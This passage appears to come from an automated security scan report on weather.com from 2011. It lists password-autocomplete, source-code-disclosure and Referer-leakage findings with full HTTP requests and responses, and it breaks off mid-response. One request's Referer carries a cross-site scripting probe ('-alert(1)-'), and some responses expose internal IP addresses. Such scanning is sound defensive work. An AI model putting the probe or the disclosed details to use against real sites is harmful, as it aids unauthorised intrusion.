HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 17:32:46 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Server: Apache SVRNAME: web1x10 VarnishSet: web X-Varnish: 1455522174 Vary: Accept-Encoding Content-Length: 96659 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<...[SNIP]... <ul class="twc-tier-2"> <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post"> <label for="twc-header-uid">...[SNIP]... </label> <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title=""> <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">...[SNIP]...
2.2. http://www.weather.com/services/desktop.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.weather.com
Path:
/services/desktop.html
Issue detail
The page contains a form with the following action URL:https://registration.weather.com/ursa/login The form contains the following password field with autocomplete enabled:
Request
GET /services/desktop.html HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Date: Thu, 24 Mar 2011 17:37:25 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding SVRNAME: web1x10 Expires: Thu, 24 Mar 2011 17:36:38 GMT Connection: keep-alive Content-Length: 96326 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Free Desktop Weather and Alerts from The Weather Channel</title> <meta name="descr...[SNIP]... <ul class="twc-tier-2"> <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post"> <label for="twc-header-uid">...[SNIP]... </label> <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title=""> <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">...[SNIP]...
2.3. http://www.weather.com/weather/health/beauty/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.weather.com
Path:
/weather/health/beauty/
Issue detail
The page contains a form with the following action URL:https://registration.weather.com/ursa/login The form contains the following password field with autocomplete enabled:
Request
GET /weather/health/beauty/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988045611%7C1303580045611%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Language: en-US Content-Type: text/html;charset=ISO-8859-1 Server: Apache Vary: Accept-Encoding SVRNAME: web2x11 Date: Thu, 24 Mar 2011 17:33:32 GMT Connection: keep-alive Content-Length: 116103 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="co...[SNIP]... <ul class="twc-tier-2"> <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post"> <label for="twc-header-uid">...[SNIP]... </label> <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title=""> <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">...[SNIP]...
3. Source code disclosure
previous
next
There are 3 instances of this issue:
3.1. http://www.weather.com/activities/driving/rushhour/
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://www.weather.com
Path:
/activities/driving/rushhour/
Issue detail
The application appears to disclose some server-side source code written in ASP.
Request
GET /activities/driving/rushhour/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 17:32:46 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Server: Apache SVRNAME: web1x10 VarnishSet: web X-Varnish: 1455522174 Vary: Accept-Encoding Content-Length: 96659 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<...[SNIP]... <script type="text/javascript"> var OAS_query = ''; var gnSiteMode=''; // Global Cache busting section // Global Cache busting section // // <% /** var remoteAddr="172.16.24.21"; var cssSpot = '/v.20101026.1'; var extdivtoolsVAR = '/v.20101222.3'; var triggerParamsstdLauncherVAR = '/v.20100929.6'; var bust_hat='/v.20100727.0'; var bust_hpCSS='/v.20100304.2'; var bust_globalNav='/v.20100727.0'; var bust_headerNavYUITypeAhead='/v.20100727.0'; var bust_recentSearch='/v.20100621.1'; var bust_s_code='/v.20110111.2'; var bust_typeAhead='/v.20100621.1'; var bust_swfObject='/v.20100621.1'; var bust_flCheckFlookie='/v.20100621.1'; var bust_eventBroadcaster='/v.20100727.0'; // **/ %> var css='style_sheet.css';if(typeof(pageType)!="undefined"&&(pageType=="920" || pageType=="980")){css="global.css";} if(typeof(pagetype)!="undefined"&&(pagetype=="980")){css="global.css";} if(ty...[SNIP]...
3.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://www.weather.com
Path:
/mobile/swap/send_sms_to_phone.html
Issue detail
The application appears to disclose some server-side source code written in ASP.
Request
GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Date: Thu, 24 Mar 2011 17:37:26 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding SVRNAME: web1x13 Expires: Thu, 24 Mar 2011 17:36:18 GMT Connection: keep-alive Content-Length: 34038 <HTML> <HEAD> <TITLE>Wireless Internet</title> <script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap...[SNIP]... <script type="text/javascript"> var OAS_query = ''; var gnSiteMode=''; // Global Cache busting section // Global Cache busting section // // <% /** var remoteAddr="172.16.24.21"; var cssSpot = '/v.20101026.1'; var extdivtoolsVAR = '/v.20101222.3'; var triggerParamsstdLauncherVAR = '/v.20100929.6'; var bust_hat='/v.20100727.0'; var bust_hpCSS='/v.20100304.2'; var bust_globalNav='/v.20100727.0'; var bust_headerNavYUITypeAhead='/v.20100727.0'; var bust_recentSearch='/v.20100621.1'; var bust_s_code='/v.20110111.2'; var bust_typeAhead='/v.20100621.1'; var bust_swfObject='/v.20100621.1'; var bust_flCheckFlookie='/v.20100621.1'; var bust_eventBroadcaster='/v.20100727.0'; // **/ %> var css='style_sheet.css';if(typeof(pageType)!="undefined"&&(pageType=="920" || pageType=="980")){css="global.css";} if(typeof(pagetype)!="undefined"&&(pagetype=="980")){css="global.css";} if(ty...[SNIP]...
3.3. http://www.weather.com/services/desktop.html
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://www.weather.com
Path:
/services/desktop.html
Issue detail
The application appears to disclose some server-side source code written in ASP.
Request
GET /services/desktop.html HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Date: Thu, 24 Mar 2011 17:37:25 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding SVRNAME: web1x10 Expires: Thu, 24 Mar 2011 17:36:38 GMT Connection: keep-alive Content-Length: 96326 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Free Desktop Weather and Alerts from The Weather Channel</title> <meta name="descr...[SNIP]... <script type="text/javascript"> var OAS_query = ''; var gnSiteMode=''; // Global Cache busting section // Global Cache busting section // // <% /** var remoteAddr="172.16.24.23"; var cssSpot = '/v.20101026.1'; var extdivtoolsVAR = '/v.20101222.3'; var triggerParamsstdLauncherVAR = '/v.20100929.6'; var bust_hat='/v.20100727.0'; var bust_hpCSS='/v.20100304.2'; var bust_globalNav='/v.20100727.0'; var bust_headerNavYUITypeAhead='/v.20100727.0'; var bust_recentSearch='/v.20100621.1'; var bust_s_code='/v.20110111.2'; var bust_typeAhead='/v.20100621.1'; var bust_swfObject='/v.20100621.1'; var bust_flCheckFlookie='/v.20100621.1'; var bust_eventBroadcaster='/v.20100727.0'; // **/ %> var css='style_sheet.css';if(typeof(pageType)!="undefined"&&(pageType=="920" || pageType=="980")){css="global.css";} if(typeof(pagetype)!="undefined"&&(pagetype=="980")){css="global.css";} if(ty...[SNIP]...
4. Cross-domain Referer leakage
previous
next
There are 6 instances of this issue:
4.1. http://www.weather.com/common/a21/makeRequest-2_3.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/common/a21/makeRequest-2_3.html
Issue detail
The page was loaded from a URL containing a query string:http://www.weather.com/common/a21/makeRequest-2_3.html?pos=WX_Top300Variable&key=1300987733362 The response contains the following link to another domain:http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js
Request
GET /common/a21/makeRequest-2_3.html?pos=WX_Top300Variable&key=1300987733362 HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fsr.a=1300987732569; fv=1; RMID=c245359a4d8b7f55
Response
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 17:28:20 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Server: Apache SVRNAME: web3x03 VarnishSet: web X-Varnish: 2587929389 Vary: Accept-Encoding Content-Length: 2503 <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=UTF-8"> <title>Make a request</title> <script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"> </script>...[SNIP]...
4.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/mobile/swap/send_sms_to_phone.html
Issue detail
The page was loaded from a URL containing a query string:http://www.weather.com/mobile/swap/send_sms_to_phone.html?from=hdr_locations The response contains the following links to other domains:http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js http://js.revsci.net/gateway/gw.js?csid=K06578 http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js
Request
GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Date: Thu, 24 Mar 2011 17:37:26 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding SVRNAME: web1x13 Expires: Thu, 24 Mar 2011 17:36:18 GMT Connection: keep-alive Content-Length: 34038 <HTML> <HEAD> <TITLE>Wireless Internet</title> <script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap...[SNIP]... <!-- DFP --><script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"> </script><script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=K06578" CHARSET="ISO-8859-1"> </script>...[SNIP]...
4.3. http://www.weather.com/pagelet/apps/traffic/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/apps/traffic/
Issue detail
The page was loaded from a URL containing a query string:http://www.weather.com/pagelet/apps/traffic/?sub The response contains the following links to other domains:http://b.imwx.com/b/page?type=top&pageID=60990 http://d.imwx.com/css/common-1-base,common-2-header,common-3-search,common-4-content,common-5-footer,common-6-alerts,common-7-panels,common-8-ads,common-9-yui.css http://d.imwx.com/css/module-1-base,module-2-seasonpromo,module-3-dl,module-4-ontv,module-5-onthisday,module-6-forecastlanding,module-7-laplinker,module-8-localalerts,module-9-iwitness.css http://d.imwx.com/css/weather-1-today,weather-2-media,weather-3-apps,weather-4-messaging.css http://d.imwx.com/js/wx-a21-plugthis-2_0.js http://i.imwx.com/web/common/images/gfx_ontv.jpg http://i.imwx.com/web/common/images/gfx_travelplanner.jpg http://i.imwx.com/web/common/images/gfx_weathernews.jpg http://s.imwx.com/global/common/elements/javascript/a21-2_3.js http://s.imwx.com/img/images/golden_loves_snow.jpg http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css http://s.imwx.com/v.20100719.135915/img/common/icon-new.png http://s.imwx.com/v.20100719.135915/img/favicon.ico http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js http://twcmediakit.com/ http://weatherbonk.com/ http://www.classmeteo.com/ http://www.controlyourtv.org/Intro.aspx http://www.eventcrazy.com/ http://www.forgetaway.com/ http://www.godaddy.com/default.aspx?isc=gdweather2 http://www.theweatherchannelkids.com/ http://www.webmd.com/allergies/default.htm
Request
POST /pagelet/apps/traffic/?sub HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? Origin: http://www.weather.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780 Content-Length: 0
Response
HTTP/1.1 400 Bad Request Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:45:00 GMT Server: Apache Vary: Accept-Encoding nnCoection: close SVRNAME: wxii1x04 X-Varnish: 1510914846 Date: Thu, 24 Mar 2011 17:40:00 GMT Connection: keep-alive Content-Length: 108234 <!DOCTYPE HTML> <html> <head> <title>Page Not Found</title><link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet"> <link href="http://s.imwx.com/v.20100719.135915/img/favicon.ico" rel="shortcut icon"> <link href="http://s.imwx.com/v.20100719.135915/img/favicon.ico" rel="icon"> <link rel="stylesheet" type="text/css" href="http://d.imwx.com/css/common-1-base,common-2-header,common-3-search,common-4-content,common-5-footer,common-6-alerts,common-7-panels,common-8-ads,common-9-yui.css"> <!--[if IE 6]>...[SNIP]... <![endif]--><link rel="stylesheet" type="text/css" href="http://d.imwx.com/css/module-1-base,module-2-seasonpromo,module-3-dl,module-4-ontv,module-5-onthisday,module-6-forecastlanding,module-7-laplinker,module-8-localalerts,module-9-iwitness.css"> <!--[if IE 6]>...[SNIP]... <![endif]--><link rel="stylesheet" type="text/css" href="http://d.imwx.com/css/weather-1-today,weather-2-media,weather-3-apps,weather-4-messaging.css" /> <style>...[SNIP]... </style><script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"> </script><script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"> </script>...[SNIP]... <div id="wx-page-inner"> <img src="http://b.imwx.com/b/page?type=top&pageID=60990" width="1" height="1" alt="" style="position:absolute;top:0px;left:0px;"> <script>...[SNIP]... <li><a href="http://www.classmeteo.com" onmousedown="setClick();" onMouseUp="this.href=intelliTrak({'href':this.href,'cm_ven' : 'weathercom','cm_cat' : 'header','cm_ite' : 'brand','cm_pla' : 'text'});" target="_self"> Italia (Italiano)</a>...[SNIP]... <a href="http://iwitness.weather.com/_Carly-Enjoying-The-Snow/video/1491535/148597.html" from="nav_spotlight"> <img src="http://s.imwx.com/img/images/golden_loves_snow.jpg" alt="Spotlight Image" width="120" height="90" /> <br>...[SNIP]... <a href="/activities/travel/vacationplanner/destination/top10/beaches.html?id=1&" from="nav_spotlight">Top 10 Beach 